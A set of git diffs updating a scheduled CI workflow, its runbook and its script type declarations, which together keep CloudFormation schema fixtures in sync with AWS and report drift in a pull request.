+            # `gh pr create` prints the PR URL; it has no --json. The number
+            # is read back by head branch rather than parsed out of the URL.
+            gh pr create \
+              --title "chore(schemas): refresh CFn schema fixtures (${cycle})" \
+              --body-file /tmp/pr-body.md \
+              --head "${branch}" \
+              --base main
+            pr_number=$(gh pr list --head "${branch}" --state open --json number --jq '.[0].number // empty')
           fi
-          gh pr comment "${{ steps.open_pr.outputs.number }}" --body \
-            "${marker}
-          The scheduled CFn schema refresh ran while this PR was still open, so it did not push. Drift is always computed against the committed fixtures, so it is cumulative — the next run after this PR merges will pick up everything that has landed since. This note is posted once, not once per run."
+
+          # Fold the newly unaccounted WRITABLE properties into the standing
+          # backfill umbrella, rather than asking a human to retype a list this
+          # job just computed. A failure here must NOT undo the PR — the PR is
+          # the load-bearing output and the list is also in its body.
+          if grep -q '^### Writable properties AWS added' /tmp/diagnosis.md; then
+            {
+              echo "Newly unaccounted writable properties, from the scheduled CFn schema refresh:"
+              echo
+              sed -n '/^### Writable properties AWS added/,/^###\|^_/p' /tmp/diagnosis.md \
+                | grep '^- ' || true
+              echo
+              echo "Carried by https://github.com/${GITHUB_REPOSITORY}/pull/${pr_number}"
+            } > /tmp/umbrella.md
+            gh issue comment "${BACKFILL_UMBRELLA}" --body-file /tmp/umbrella.md \
+              || echo "::warning::Could not comment on the backfill umbrella issue; the list is in the PR body."
+          fi

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -247,13 +247,15 @@ jobs:
           # what makes the silence expensive.
           # EVERY fixture-driven CI check runs here, and every red is COLLECTED
           # rather than tolerated. Each of these reads
-          # `tests/fixtures/cfn-schemas/` and hard-fails CI, and two of the
-          # three are reddened by a pure schema ADDITION — the shape a reader is
-          # most likely to wave through. `property-coverage`'s status was
-          # discarded for six review rounds and its red rendered as "nothing
-          # needs a decision"; the other two were found the round after.
+          # `tests/fixtures/cfn-schemas/` and hard-fails CI, and EVERY one of
+          # them is reddened by a pure schema ADDITION — the shape a reader is
+          # most likely to wave through, which is what made the silence
+          # expensive. `property-coverage`'s status was discarded for six review
+          # rounds and its red rendered as "nothing needs a decision"; the two
+          # audit checks were found the round after, and the unit-test family
+          # the round after that.
           #
-          # Adding a fourth is a line here and a `CHECK_GUIDANCE` row in
+          # Adding another is a line here and a `CHECK_GUIDANCE` row in
           # scripts/diagnose-schema-refresh.mjs. The list is fenced against that
           # table by tests/unit/scripts/cfn-schema-refresh-workflow.test.ts.
           failed_checks=""
@@ -277,8 +279,16 @@ jobs:
           # contents. They run under ci.yml's whole-suite job, not under any
           # audit task, so a schema change reddens CI with nothing in the
           # diagnosis to explain it.
+          # `props.test`, covering a FAMILY: five suites carry the same
+          # zero-headroom assertion (`silentDrop` must be empty), so naming one
+          # of them covered three files of five, and one writable property added
+          # to any of six types would have redded CI with nothing in the
+          # diagnosis. Not `-props` — vitest parses a leading dash as a FLAG and
+          # the step dies with `Unknown option \`-p\``. The filter set is fenced
+          # against the real family, and against that shape, by
+          # tests/unit/scripts/cfn-schema-refresh-workflow.test.ts.
           run_check fixture-consumer-tests \
-            vp test run mutually-exclusive-properties ecs-deployment-configuration-subfield ecs-service-config-props
+            vp test run mutually-exclusive-properties ecs-deployment-configuration-subfield props.test
           # Through the environment FILE, not a shell variable: each `run:` is
           # its own shell, so a plain assignment here is simply gone by the
           # Diagnose step — and an absent `--failed-checks` reads as "nothing

--- a/docs/schema-refresh-runbook.md
+++ b/docs/schema-refresh-runbook.md
@@ -22,6 +22,7 @@ why the job is allowed to fail — is in
 | No pull request | Nothing. Most days are this. |
 | A pull request, CI green | Read the diff, squash merge. |
 | A pull request, CI red | Two classes need a decision — the PR names which. |
+| A pull request saying the nested-key check failed unreadably | Read that job's log; the other sections still hold. |
 | A comment on an open pull request | New drift was added to it. Same two classes. |
 
 The job keeps **at most one pull request open**. While one is open, later runs
@@ -56,7 +57,10 @@ Nothing that encodes a judgement is touched: no `unhandledByDesign`, no
 
 If a push onto an open pull request would not fast-forward — someone pushed
 while the job ran — it gives up for that cycle with a warning rather than
-forcing. The next run recomputes the same drift.
+forcing. The next run recomputes the same drift. A push that fails while the
+branch has NOT moved is a different thing (a permission or branch-protection
+problem), and fails the job loudly instead: a green daily run that lands
+nothing, forever, is the failure mode worth being noisy about.
 
 ## A green pull request
 
@@ -96,8 +100,11 @@ A provider still declares a property AWS no longer publishes.
 published model; the API is the behaviour.
 
 The pull request does most of this for you — it says whether the AWS SDK still
-models the name, and flags a **likely rename** when the same refresh added a
-name to the same type. To settle the rest:
+models the name, and flags a **possible rename** when the same refresh added a
+settable name to the same type whose spelling extends or is extended by the
+removed one. That test is deliberately narrow: a rename that changes the middle
+of a name is not flagged, so the absence of a flag is not evidence there was no
+rename. To settle the rest:
 
 ```bash
 # 1. Confirm against the live registry — the API AWS serves, not the bundle.
@@ -108,10 +115,10 @@ aws cloudformation describe-type --type RESOURCE --type-name 'AWS::Service::Type
 vp test run property-coverage
 ```
 
-If a rename was flagged, take it: point the declaration at the new name. If
-both the SDK and the live registry have dropped the name, delete the
-declaration. If either still knows it, add a `bogusTolerated` entry with a
-one-line reason.
+A flagged rename is a name-similarity guess, not a finding — confirm it in step
+1 before repointing the declaration at the new name. If both the SDK and the
+live registry have dropped the name, delete the declaration. If either still
+knows it, add a `bogusTolerated` entry with a one-line reason.
 
 ### A nested key diverged
 

--- a/docs/schema-refresh-runbook.md
+++ b/docs/schema-refresh-runbook.md
@@ -92,14 +92,16 @@ renamed property**, and a **nested-key divergence**.
 
 The rest are CI checks that read the schema fixtures, and the pull request gives
 each one that failed its own section with the commands to settle it — so this
-page does not enumerate them. Two are worth knowing about because a plain
-schema **addition** reaches them, which is the shape easiest to wave through:
+page does not enumerate them. What they have in common is worth knowing: a plain
+schema **addition** reaches every one, which is the shape easiest to wave
+through.
 
 | Check | What an addition did |
 | --- | --- |
 | `property-coverage` | AWS re-added a property a provider had written off with a `bogusTolerated` rationale, so the rationale is now false |
 | `audit:sdk-attr-coverage:check` | A new read-only `*Arn` / `*Url` on a type that had none, which a cross-resource `Fn::GetAtt` cannot resolve |
 | `audit:enrichment-coverage:check` | A new computed attribute on a Cloud-Control type that nothing populates on read |
+| `fixture-consumer-tests` | A unit test asserting something about a specific type's schema no longer matches the capture |
 
 A fourth section, **"Fixtures this report could not read"**, means the
 comparison itself failed for those types — neither their removals nor their

--- a/docs/schema-refresh-runbook.md
+++ b/docs/schema-refresh-runbook.md
@@ -23,7 +23,8 @@ why the job is allowed to fail — is in
 | A pull request, CI green | Read the diff, squash merge. |
 | A pull request, CI red | Something needs a decision — the PR names which class. |
 | A pull request saying the nested-key check failed unreadably | Read that job's log; the other sections still hold. |
-| A comment on an open pull request | New drift was added to it. Same two classes. |
+| A comment on an open pull request | New drift was added to it. Same classes. |
+| A section naming a failed CI check | That check's own guidance is in the PR; its findings are not covered by the other sections. |
 
 The job keeps **at most one pull request open**. While one is open, later runs
 push the new drift onto that same branch and comment with what it added, so
@@ -86,12 +87,24 @@ Red is the hand-off, not a defect. The pull request names which class fired, on
 which type, which provider lines mention it, and what the AWS SDK still models —
 so the research is already done and what is left is the decision.
 
-Three classes reach it. Two need a judgement and have their own sections below.
-The third is mechanical: a **stale `bogusTolerated` rationale** — AWS re-added a
-property a provider had written off as gone from the schema, so the rationale is
-now false. Delete that entry and account for the property normally
-(`handledProperties` if the provider wires it, `unhandledByDesign` with a reason
-if it does not). `vp test run property-coverage` names every entry involved.
+Two of them need a judgement and have their own sections below: a **removed or
+renamed property**, and a **nested-key divergence**.
+
+The rest are CI checks that read the schema fixtures, and the pull request gives
+each one that failed its own section with the commands to settle it — so this
+page does not enumerate them. Two are worth knowing about because a plain
+schema **addition** reaches them, which is the shape easiest to wave through:
+
+| Check | What an addition did |
+| --- | --- |
+| `property-coverage` | AWS re-added a property a provider had written off with a `bogusTolerated` rationale, so the rationale is now false |
+| `audit:sdk-attr-coverage:check` | A new read-only `*Arn` / `*Url` on a type that had none, which a cross-resource `Fn::GetAtt` cannot resolve |
+| `audit:enrichment-coverage:check` | A new computed attribute on a Cloud-Control type that nothing populates on read |
+
+A fourth section, **"Fixtures this report could not read"**, means the
+comparison itself failed for those types — neither their removals nor their
+additions are accounted for anywhere in the pull request, so read the refresh
+job's log.
 
 ### A property was removed or renamed
 

--- a/docs/schema-refresh-runbook.md
+++ b/docs/schema-refresh-runbook.md
@@ -1,0 +1,205 @@
+---
+title: CFn schema refresh runbook
+description: "What the daily schema-fixture refresh job does, and what a maintainer does when it opens a pull request."
+unlisted: true
+---
+
+# CFn schema refresh runbook
+
+A scheduled job keeps `tests/fixtures/cfn-schemas/*.json` current with what AWS
+publishes, because those fixtures decide SDK-vs-Cloud-Control routing and a
+property missing from them is dropped silently. This page is the operator's
+side of it: what arrives, and what to do with it.
+
+The reasoning behind the design — why a scheduled PR rather than a CI check,
+why the job is allowed to fail — is in
+[Provider Rules](provider-rules.md#workflow-when-aws-publishes-new-properties).
+
+## The short version
+
+| What you see | What to do |
+| --- | --- |
+| No pull request | Nothing. Most days are this. |
+| A pull request, CI green | Read the diff, squash merge. |
+| A pull request, CI red | Two classes need a decision — the PR names which. |
+| A comment on an open pull request | New drift was added to it. Same two classes. |
+
+The job keeps **at most one pull request open**. While one is open, later runs
+push the new drift onto that same branch and comment with what it added, so
+nothing waits for a merge.
+
+Your commits on that branch are safe **while the pull request is open**: the
+push is additive and never forced, everything the job rewrites is derived and
+recomputed from your current sources, and the classification you write does not
+live in those files. Once a pull request is CLOSED without merging, its branch
+loses that protection — a same-day re-run reuses the name and replaces it. If
+you want to keep working on a closed one, rename the branch first.
+
+## What the job does
+
+Daily, on `bot/cfn-schema-refresh/<YYYY-MM-DD>`:
+
+1. Switches to the open refresh pull request's branch, if there is one, so
+   drift is measured against what that PR already carries.
+2. Downloads AWS's public CloudFormation schema bundle. No AWS credentials are
+   involved.
+3. Rewrites only the fixtures that actually changed. A capture-date-only
+   difference is not a change.
+4. **Stops if nothing drifted** — no branch, no pull request, no comment.
+5. Otherwise regenerates the derived artifacts, then either opens a pull
+   request or adds a commit and a diagnosis comment to the open one.
+6. Adds any newly unaccounted writable properties to the standing backfill
+   issue.
+
+Nothing that encodes a judgement is touched: no `unhandledByDesign`, no
+`bogusTolerated`, no `NESTED_KEY_ALLOW_LIST`, no provider code.
+
+If a push onto an open pull request would not fast-forward — someone pushed
+while the job ran — it gives up for that cycle with a warning rather than
+forcing. The next run recomputes the same drift.
+
+## A green pull request
+
+Merge it. Properties were added and nothing else.
+
+From the merge on, a template using one of those properties routes through
+Cloud Control instead of being dropped. Before it, the same template got a
+deploy-time warning — the value was never silently lost, but it did not work
+either.
+
+Newly unaccounted **writable** properties are listed in the pull request and
+posted to the standing backfill issue by the job itself. Wiring them into an
+SDK provider is separate, unhurried work.
+
+**Writable** matters here: a schema property AWS computes and returns
+(`readOnlyProperties` — an `Arn`, a `DomainName`) can never be a dropped value,
+because there was nothing to send. Only settable properties represent work. In
+a typical cycle most additions are read-only.
+
+## A red pull request
+
+Red is the hand-off, not a defect. Exactly two classes reach it, and the pull
+request names which fired, on which type, which provider lines mention it, and
+what the AWS SDK still models — so the research is already done and what is
+left is the decision.
+
+### A property was removed or renamed
+
+A provider still declares a property AWS no longer publishes.
+
+| Option | Meaning | Choose it when |
+| --- | --- | --- |
+| Delete the declaration | cdkd stops sending the property | AWS dropped it from the API too |
+| Add a `bogusTolerated` rationale | cdkd keeps sending it | The API still accepts it, or the name is SDK-only |
+
+**Removal from the schema does not mean the API rejects it.** The schema is a
+published model; the API is the behaviour.
+
+The pull request does most of this for you — it says whether the AWS SDK still
+models the name, and flags a **likely rename** when the same refresh added a
+name to the same type. To settle the rest:
+
+```bash
+# 1. Confirm against the live registry — the API AWS serves, not the bundle.
+aws cloudformation describe-type --type RESOURCE --type-name 'AWS::Service::Type' \
+  --query Schema --output text | jq -r '.properties | keys[]' | grep -i 'PropertyName'
+
+# 2. After editing, this names anything still bogus.
+vp test run property-coverage
+```
+
+If a rename was flagged, take it: point the declaration at the new name. If
+both the SDK and the live registry have dropped the name, delete the
+declaration. If either still knows it, add a `bogusTolerated` entry with a
+one-line reason.
+
+### A nested key diverged
+
+A `NESTED_KEY_TARGETS` type gained a nested key whose spelling does not match
+the AWS SDK model. The check reports divergences, not staleness, so
+regenerating never clears one.
+
+| Option | Meaning | Choose it when |
+| --- | --- | --- |
+| Fix the provider | cdkd starts sending the key | The SDK models it under a different spelling |
+| Add a `NESTED_KEY_ALLOW_LIST` entry | cdkd never sends it | The SDK genuinely has no such member |
+
+A `case-divergence` needs no judgement: the SDK models the key under a
+different capitalisation, so rename it in the provider.
+
+For `no-sdk-member` / `definition-member-missing`, rule out the installed SDK
+simply lagging the service before allow-listing anything — an entry added over
+a stale SDK hides a real dropped value:
+
+```bash
+# What is installed, versus what npm publishes today.
+node -p "require('@aws-sdk/client-<service>/package.json').version"
+npm view @aws-sdk/client-<service> version
+
+# If a newer one exists, bump it and re-check before deciding.
+vp run audit:nested-key-coverage:check
+```
+
+Only when the SDK is current and still lacks the member — and the service's own
+API reference agrees — add a `NESTED_KEY_ALLOW_LIST` entry with a reason.
+
+### Why this is not decided for you
+
+Most of the work is done for you. AWS publishes a third description of each
+service — the SDK — and the job consults it, so the pull request already says
+whether a removed property is still modelled there — searched case-insensitively
+across every client the provider imports, because SDK and CFn capitalisation
+routinely differ. That is the evidence the decision turns on, and it usually
+settles the question.
+
+For a nested-key divergence it also reports whether the installed client is
+behind npm. If it is current, the "the SDK just lags" reading is eliminated
+outright. If it is behind, that reading is live — but whether a bump actually
+fixes the divergence is an interface-level question a name lookup cannot answer,
+so re-run the check after bumping rather than assuming.
+
+What is left is genuinely undecidable from the repository:
+
+- A **rename looks exactly like a removal** at the name level, which is why
+  this repository carries hand-maintained rename maps at all.
+- `no-sdk-member` means the **installed** SDK version lacks the member. That
+  can be the SDK lagging the service rather than the service lacking it.
+- Adding an allow-list entry is a promise that cdkd will never send the value.
+  That is a policy choice, not a lookup.
+
+The asymmetry matters more than the ambiguity: the silencing option
+(`bogusTolerated`, `NESTED_KEY_ALLOW_LIST`) is always available and always
+turns CI green. Anything choosing automatically under uncertainty converges on
+it, and that quietly disables the checks that exist to catch dropped values.
+
+## Running it by hand
+
+```bash
+# Pull a refresh forward, or check what AWS has changed. No credentials needed.
+vp run gen:cfn-schemas-from-zip
+
+# One type, through the authenticated path. Required for types the public
+# bundle does not carry.
+node scripts/refresh-cfn-schemas.mjs 'AWS::Service::Type'
+
+# See what changed, then let the coverage test name what is unaccounted.
+git diff tests/fixtures/cfn-schemas/
+vp test run property-coverage
+```
+
+Trigger the scheduled job without waiting for the next day from the repository's
+Actions tab, or with `gh workflow run cfn-schema-refresh.yml`.
+
+## Branch names are reserved
+
+The open-pull-request guard matches on the branch prefix
+`bot/cfn-schema-refresh/` in this repository. A pull request of your own from a
+branch under that prefix reads as the open refresh PR, and the job will push its
+drift onto your branch. Fork PRs are excluded, so this only applies to branches
+here.
+
+## Related
+
+- [Provider Rules](provider-rules.md) — why the job is shaped this way, and the `bogusTolerated` conventions
+- [Provider Development](provider-development.md) — adding a provider, including its first fixture capture
+- [State Management](state-management.md) — what a routing change does to an existing resource's state record

--- a/docs/schema-refresh-runbook.md
+++ b/docs/schema-refresh-runbook.md
@@ -21,7 +21,7 @@ why the job is allowed to fail — is in
 | --- | --- |
 | No pull request | Nothing. Most days are this. |
 | A pull request, CI green | Read the diff, squash merge. |
-| A pull request, CI red | Two classes need a decision — the PR names which. |
+| A pull request, CI red | Something needs a decision — the PR names which class. |
 | A pull request saying the nested-key check failed unreadably | Read that job's log; the other sections still hold. |
 | A comment on an open pull request | New drift was added to it. Same two classes. |
 
@@ -82,10 +82,16 @@ a typical cycle most additions are read-only.
 
 ## A red pull request
 
-Red is the hand-off, not a defect. Exactly two classes reach it, and the pull
-request names which fired, on which type, which provider lines mention it, and
-what the AWS SDK still models — so the research is already done and what is
-left is the decision.
+Red is the hand-off, not a defect. The pull request names which class fired, on
+which type, which provider lines mention it, and what the AWS SDK still models —
+so the research is already done and what is left is the decision.
+
+Three classes reach it. Two need a judgement and have their own sections below.
+The third is mechanical: a **stale `bogusTolerated` rationale** — AWS re-added a
+property a provider had written off as gone from the schema, so the rationale is
+now false. Delete that entry and account for the property normally
+(`handledProperties` if the provider wires it, `unhandledByDesign` with a reason
+if it does not). `vp test run property-coverage` names every entry involved.
 
 ### A property was removed or renamed
 

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -2,13 +2,28 @@
  * Type declarations for `diagnose-schema-refresh.mjs` (a `@ts-check` JS module),
  * so its unit test typechecks under `tsconfig.test.json`.
  */
+export interface NestedKeyDivergence {
+  resourceType: string;
+  nestedKey: string;
+  bucket: string;
+  detail: string;
+}
+export interface SdkLagRow {
+  resourceType: string;
+  client: string;
+  installed: string;
+  latest: string;
+  behind: boolean;
+}
+export declare const NESTED_KEY_FAILURE_RE: RegExp;
 export declare function comparePropertySets(
   committedJson: string,
   refreshedJson: string
 ): { removed: string[]; added: string[]; writableAdded: string[] };
-export declare function parseNestedKeyDivergences(
-  checkOutput: string
-): Array<{ resourceType: string; bucket: string; line: string }>;
+export declare function parseNestedKeyDivergences(checkOutput: string): {
+  divergences: NestedKeyDivergence[];
+  unparsedFailure: boolean;
+};
 export declare function mapTypesToProviderFiles(source: string): Map<string, string>;
 export declare function findDeclarationCandidates(
   property: string,
@@ -21,6 +36,10 @@ export declare function sdkModelsMember(
   providerRelPath: string | undefined,
   repoRoot?: string
 ): { client: string; modelled: boolean; version?: string; consulted?: string[] } | undefined;
+export declare function sdkClientVersions(
+  providerRelPath: string | undefined,
+  repoRoot?: string
+): Array<{ client: string; version: string }>;
 export declare function parseDeclaredProperties(
   generatedSource: string
 ): Map<string, Set<string>>;
@@ -35,8 +54,9 @@ export declare function renderDiagnosis(input: {
   }>;
   writableAdded: Array<{ resourceType: string; properties: string[] }>;
   readOnlyAddedCount?: number;
-  sdkLag?: { client: string; resourceType: string; installed: string; latest: string; behind: boolean };
-  divergences: Array<{ resourceType: string; bucket: string; line: string }>;
+  sdkLag?: SdkLagRow[];
+  divergences: NestedKeyDivergence[];
+  nestedKeyUnparsed?: boolean;
   skipped: string[];
 }): string;
 export declare function sdkVersionLag(
@@ -46,3 +66,10 @@ export declare function sdkVersionLag(
 ): { installed: string; latest: string; behind: boolean } | undefined;
 export declare function pairRenames(property: string, writableAdded: readonly string[]): string[];
 export declare function renderName(name: string): string;
+export declare function renderLiteral(name: string): string;
+export declare function renderKey(key: string): string;
+export declare function renderDetail(text: string): string;
+export declare function clientsForType(
+  resourceType: string,
+  rows: Array<{ client: string; version: string }>
+): Array<{ client: string; version: string }>;

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -14,8 +14,12 @@ export interface SdkLagRow {
   installed: string;
   latest: string;
   behind: boolean;
-  /** Whether `clientsForType` matched this client to the type's own service. */
-  matched?: boolean;
+  /**
+   * Whether the client was resolved to the type's own service. REQUIRED, not
+   * optional: an omitted flag reads as `!== false` and renders the confident
+   * "here", which is the fail-open direction a round-4 fix already shipped once.
+   */
+  matched: boolean;
 }
 export declare const NESTED_KEY_FAILURE_RE: RegExp;
 export declare function comparePropertySets(

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -132,4 +132,3 @@ export declare function collectFixtureDeltas(input: {
 export declare function loadDeclaredProperties(repoRoot?: string): Map<string, Set<string>>;
 export declare function classifyGitShowFailure(stderr: string): undefined | typeof UNREADABLE;
 export declare const KNOWN_FLAGS: string[];
-export declare const KNOWN_FLAGS: string[];

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -14,6 +14,8 @@ export interface SdkLagRow {
   installed: string;
   latest: string;
   behind: boolean;
+  /** Whether `clientsForType` matched this client to the type's own service. */
+  matched?: boolean;
 }
 export declare const NESTED_KEY_FAILURE_RE: RegExp;
 export declare function comparePropertySets(
@@ -46,16 +48,27 @@ export declare function sdkClientVersions(
 export declare function parseDeclaredProperties(
   generatedSource: string
 ): Map<string, Set<string>>;
+export interface SdkEvidence {
+  client: string;
+  modelled: boolean;
+  version?: string;
+  consulted?: string[];
+}
+export interface RemovedEntry {
+  resourceType: string;
+  properties: string[];
+  candidates: Record<string, string[]>;
+  sdk?: Record<string, SdkEvidence | undefined>;
+  renameCandidates?: Record<string, string[]>;
+  providerPath?: string;
+}
+export interface AddedEntry {
+  resourceType: string;
+  properties: string[];
+}
 export declare function renderDiagnosis(input: {
-  removed: Array<{
-    resourceType: string;
-    properties: string[];
-    candidates: Record<string, string[]>;
-    sdk?: Record<string, { client: string; modelled: boolean; version?: string; consulted?: string[] } | undefined>;
-    renameCandidates?: Record<string, string[]>;
-    providerPath?: string;
-  }>;
-  writableAdded: Array<{ resourceType: string; properties: string[] }>;
+  removed: RemovedEntry[];
+  writableAdded: AddedEntry[];
   readOnlyAddedCount?: number;
   sdkLag?: SdkLagRow[];
   divergences: NestedKeyDivergence[];
@@ -75,7 +88,7 @@ export declare function renderDetail(text: string): string;
 export declare function clientsForType(
   resourceType: string,
   rows: Array<{ client: string; version: string }>
-): Array<{ client: string; version: string }>;
+): Array<{ client: string; version: string; matched: boolean }>;
 export declare function buildSdkLag(
   divergences: Array<{ resourceType: string; bucket: string }>,
   clientsFor: (resourceType: string) => Array<{ client: string; version: string }>,

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -77,7 +77,7 @@ export interface DiagnosisInput {
   sdkLag?: SdkLagRow[];
   divergences: NestedKeyDivergence[];
   nestedKeyUnparsed?: boolean;
-  propertyCoverageFailed?: boolean;
+  failedChecks?: string[];
   unreadable?: string[];
   skipped: string[];
 }
@@ -104,9 +104,11 @@ export declare function buildSdkLag(
     installed: string
   ) => { installed: string; latest: string; behind: boolean } | undefined
 ): SdkLagRow[];
+export declare const UNREADABLE: unique symbol;
+export declare const CHECK_GUIDANCE: Record<string, string[]>;
 export declare function collectFixtureDeltas(input: {
   files: string[];
-  committedOf: (file: string) => string | undefined;
+  committedOf: (file: string) => string | undefined | typeof UNREADABLE;
   currentOf: (file: string) => string;
   providerFiles: Map<string, string>;
   declared: Map<string, Set<string>>;
@@ -127,3 +129,4 @@ export declare function collectFixtureDeltas(input: {
   readOnlyAddedCount: number;
   unreadable: string[];
 };
+export declare function loadDeclaredProperties(repoRoot?: string): Map<string, Set<string>>;

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -20,7 +20,10 @@ export declare function comparePropertySets(
   committedJson: string,
   refreshedJson: string
 ): { removed: string[]; added: string[]; writableAdded: string[] };
-export declare function parseNestedKeyDivergences(checkOutput: string): {
+export declare function parseNestedKeyDivergences(
+  checkOutput: string,
+  exitCode?: number
+): {
   divergences: NestedKeyDivergence[];
   unparsedFailure: boolean;
 };
@@ -73,3 +76,11 @@ export declare function clientsForType(
   resourceType: string,
   rows: Array<{ client: string; version: string }>
 ): Array<{ client: string; version: string }>;
+export declare function buildSdkLag(
+  divergences: Array<{ resourceType: string; bucket: string }>,
+  clientsFor: (resourceType: string) => Array<{ client: string; version: string }>,
+  versionLag?: (
+    client: string,
+    installed: string
+  ) => { installed: string; latest: string; behind: boolean } | undefined
+): SdkLagRow[];

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -44,7 +44,7 @@ export declare function sdkModelsMember(
   property: string,
   providerRelPath: string | undefined,
   repoRoot?: string
-): { client: string; modelled: boolean; version?: string; consulted?: string[] } | undefined;
+): SdkEvidence | undefined;
 export declare function sdkClientVersions(
   providerRelPath: string | undefined,
   repoRoot?: string
@@ -70,15 +70,18 @@ export interface AddedEntry {
   resourceType: string;
   properties: string[];
 }
-export declare function renderDiagnosis(input: {
+export interface DiagnosisInput {
   removed: RemovedEntry[];
   writableAdded: AddedEntry[];
   readOnlyAddedCount?: number;
   sdkLag?: SdkLagRow[];
   divergences: NestedKeyDivergence[];
   nestedKeyUnparsed?: boolean;
+  propertyCoverageFailed?: boolean;
+  unreadable?: string[];
   skipped: string[];
-}): string;
+}
+export declare function renderDiagnosis(input: DiagnosisInput): string;
 export declare function sdkVersionLag(
   client: string,
   installed: string | undefined,
@@ -101,3 +104,26 @@ export declare function buildSdkLag(
     installed: string
   ) => { installed: string; latest: string; behind: boolean } | undefined
 ): SdkLagRow[];
+export declare function collectFixtureDeltas(input: {
+  files: string[];
+  committedOf: (file: string) => string | undefined;
+  currentOf: (file: string) => string;
+  providerFiles: Map<string, string>;
+  declared: Map<string, Set<string>>;
+  declarationCandidates?: (
+    property: string,
+    providerRelPath: string | undefined,
+    resourceType?: string,
+    repoRoot?: string
+  ) => string[];
+  sdkEvidence?: (
+    property: string,
+    providerRelPath: string | undefined,
+    repoRoot?: string
+  ) => SdkEvidence | undefined;
+}): {
+  removed: RemovedEntry[];
+  writableAdded: AddedEntry[];
+  readOnlyAddedCount: number;
+  unreadable: string[];
+};

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -1,0 +1,45 @@
+/**
+ * Type declarations for `diagnose-schema-refresh.mjs` (a `@ts-check` JS module),
+ * so its unit test typechecks under `tsconfig.test.json`.
+ */
+export declare function comparePropertySets(
+  committedJson: string,
+  refreshedJson: string
+): { removed: string[]; added: string[]; writableAdded: string[] };
+export declare function parseNestedKeyDivergences(
+  checkOutput: string
+): Array<{ resourceType: string; bucket: string; line: string }>;
+export declare function mapTypesToProviderFiles(source: string): Map<string, string>;
+export declare function findDeclarationCandidates(
+  property: string,
+  providerRelPath: string | undefined,
+  resourceType?: string,
+  repoRoot?: string
+): string[];
+export declare function sdkModelsMember(
+  property: string,
+  providerRelPath: string | undefined,
+  repoRoot?: string
+): { client: string; modelled: boolean; version?: string; consulted?: string[] } | undefined;
+export declare function parseDeclaredProperties(
+  generatedSource: string
+): Map<string, Set<string>>;
+export declare function renderDiagnosis(input: {
+  removed: Array<{
+    resourceType: string;
+    properties: string[];
+    candidates: Record<string, string[]>;
+    sdk?: Record<string, { client: string; modelled: boolean; version?: string; consulted?: string[] } | undefined>;
+    renameCandidates?: Record<string, string[]>;
+  }>;
+  writableAdded: Array<{ resourceType: string; properties: string[] }>;
+  readOnlyAddedCount?: number;
+  sdkLag?: { client: string; installed: string; latest: string; behind: boolean };
+  divergences: Array<{ resourceType: string; bucket: string; line: string }>;
+  skipped: string[];
+}): string;
+export declare function sdkVersionLag(
+  client: string,
+  installed: string | undefined,
+  viewLatest?: (pkg: string) => string
+): { installed: string; latest: string; behind: boolean } | undefined;

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -131,3 +131,5 @@ export declare function collectFixtureDeltas(input: {
 };
 export declare function loadDeclaredProperties(repoRoot?: string): Map<string, Set<string>>;
 export declare function classifyGitShowFailure(stderr: string): undefined | typeof UNREADABLE;
+export declare const KNOWN_FLAGS: string[];
+export declare const KNOWN_FLAGS: string[];

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -130,3 +130,4 @@ export declare function collectFixtureDeltas(input: {
   unreadable: string[];
 };
 export declare function loadDeclaredProperties(repoRoot?: string): Map<string, Set<string>>;
+export declare function classifyGitShowFailure(stderr: string): undefined | typeof UNREADABLE;

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -31,10 +31,11 @@ export declare function renderDiagnosis(input: {
     candidates: Record<string, string[]>;
     sdk?: Record<string, { client: string; modelled: boolean; version?: string; consulted?: string[] } | undefined>;
     renameCandidates?: Record<string, string[]>;
+    providerPath?: string;
   }>;
   writableAdded: Array<{ resourceType: string; properties: string[] }>;
   readOnlyAddedCount?: number;
-  sdkLag?: { client: string; installed: string; latest: string; behind: boolean };
+  sdkLag?: { client: string; resourceType: string; installed: string; latest: string; behind: boolean };
   divergences: Array<{ resourceType: string; bucket: string; line: string }>;
   skipped: string[];
 }): string;
@@ -43,3 +44,5 @@ export declare function sdkVersionLag(
   installed: string | undefined,
   viewLatest?: (pkg: string) => string
 ): { installed: string; latest: string; behind: boolean } | undefined;
+export declare function pairRenames(property: string, writableAdded: readonly string[]): string[];
+export declare function renderName(name: string): string;

--- a/scripts/diagnose-schema-refresh.d.mts
+++ b/scripts/diagnose-schema-refresh.d.mts
@@ -132,3 +132,4 @@ export declare function collectFixtureDeltas(input: {
 export declare function loadDeclaredProperties(repoRoot?: string): Map<string, Set<string>>;
 export declare function classifyGitShowFailure(stderr: string): undefined | typeof UNREADABLE;
 export declare const KNOWN_FLAGS: string[];
+export declare function assertFixtureFloor(fixtureCount: number, declaredCount: number): void;

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -78,7 +78,6 @@ export const UNREADABLE = Symbol('unreadable');
  * @typedef {import('./diagnose-schema-refresh.d.mts').AddedEntry} AddedEntry
  */
 
-
 /**
  * Every way `gen-nested-key-coverage.ts --check` announces a failure.
  *
@@ -581,36 +580,15 @@ export function parseDeclaredProperties(generatedSource) {
 }
 
 /**
- * Render the Markdown appended to the pull-request body.
- *
- * It NAMES what fired, where, and what the SDK says about it — then stops.
- *
- * The stopping point is narrower than it first looks, and the earlier framing
- * of it here was wrong: "the tiebreaker is in neither model" ignored that AWS
- * publishes a THIRD description, the SDK, which this repo already reads. So the
